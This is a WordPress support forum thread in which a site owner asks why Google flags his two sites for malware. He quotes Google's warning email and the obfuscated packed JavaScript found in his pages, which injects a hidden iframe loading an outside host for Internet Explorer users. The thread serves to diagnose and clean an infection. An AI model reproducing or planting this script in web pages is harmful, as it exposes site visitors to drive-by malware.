WordPress.org

Ready to get started?Download WordPress

Forums

Google is telling me my site has malware! (2 posts)

  1. nexitv
    Member
    Posted 2 years ago #

    Hello,

    I am hoping someone can help me here. I have the same problem on two of my website;

    http://www.nexi.tv and http://www.filmlive.tv

    Google sent me this email;

    Dear site owner or webmaster of nexi.tv,
    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

    http://nexi .tv/
    http://www.nexi .tv/
    http://nexi .tv/advertise/

    Here is a link to a sample warning page:
    http://www.google.com/interstitial?url=http%3A//nexi.tv/

    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser
    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    http://www.stopbadware.org/home/security

    Once you've secured your site, you can request that the warning be removed by visiting
    http://www.google.com/support/webmasters/bin/answer.py?answer=45432
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.

    Sincerely,
    Google Search Quality Team

    When I log into Webmaster tools it gives me a list of infected pages and it tells me that the following code is the problem'

    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
    '':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
    .toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c
    )]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){retu
    rn'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\
    \b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!
    a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\'
    ;0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3(
    "p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u(
    "9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|M
    akeFrameEx|element|yahoo_api|height|width|display|none|body|
    getElementById|function|createElement|iframe|appendChild|src
    |id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
    |userAgent|1000|hgdh|navigator|ai|showthread|php|72241732'.s
    plit('|'),0,{}))
    </script>

    When I view the source code I can see the script on the site.

    I have tried re-installing wordpress to no avail.

    Does anyone know what this is and how to fix it?

    Thanks.

    Ben

  2. This is a "packed" javascript code. You can "unpack" it to help identify the cause.

    EDIT: Check this page here... looks like this guy had the same thing happen.

    http://www.victorciobanu.com/how-to-remove-mwjsdepack/

Topic Closed

This topic has been closed to new replies.

About this Topic